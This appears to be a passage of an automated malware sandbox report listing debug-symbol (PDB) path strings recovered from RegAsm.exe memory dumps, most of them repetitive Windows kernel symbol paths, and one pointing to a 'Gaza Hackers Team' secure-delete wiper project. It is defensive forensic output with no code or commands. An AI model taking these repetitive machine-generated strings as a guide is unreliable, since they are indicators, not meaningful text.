        Source: Binary string: $^q{C:\Documents and Settings\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qnC:\Documents and Settings\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3705258200.00000000030E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3705258200.00000000030E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qmC:\Documents and Settings\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3705258200.00000000030E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^q|C:\Documents and Settings\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3705258200.00000000030E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qKC:\Documents and Settings\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qLC:\Documents and Settings\user\Local Settings\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qzC:\Documents and Settings\user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^q}C:\Documents and Settings\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qxC:\Documents and Settings\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: G:\Gaza Hackers Team\Handala WP\SecureDeleteFilesConsole\obj\Debug\SecureDeleteFilesConsole.pdbt source: RegAsm.exe, 0000000F.00000002.3703692097.00000000007D9000.00000040.00000400.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qXC:\Documents and Settings\user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qzC:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qGC:\Documents and Settings\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qvC:\Documents and Settings\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qwC:\Documents and Settings\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
